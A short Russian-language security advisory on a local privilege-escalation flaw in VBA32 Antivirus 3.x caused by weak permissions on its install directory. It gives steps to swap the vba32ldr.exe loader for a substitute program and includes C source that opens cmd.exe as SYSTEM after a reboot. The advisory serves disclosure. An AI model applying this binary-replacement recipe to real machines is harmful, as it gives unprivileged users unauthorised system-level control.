Программа: VBA32 Antivirus 3.x Уязвимость позволяет локальному злоумышленнику выполнить вредоносные действия с повышенными привилегиями на целевой системе. Уязвимость существует из-за того, что приложение не правильно устанавливает права доступа на инсталляционную директорию VBA32. Атакующий может заменить файлы в директории VBA32, что позволит ему повысить свои привилегии на целевой системе.
Пример:
- Войти в систему как LUA пользователь
- Переименовать vba32ldr.exe в vba32ldr.exe.BAK
- Скопировать program.exe в Vba32 инсталляционную директорию
- Переименовать program.exe в vba32ldr.exe
- Перезагрузить операционную систему
- "rootshell"
#Исходный код для program.exe:#include <stdio.h>int main()
{ system("cmd.exe"); return 0;
}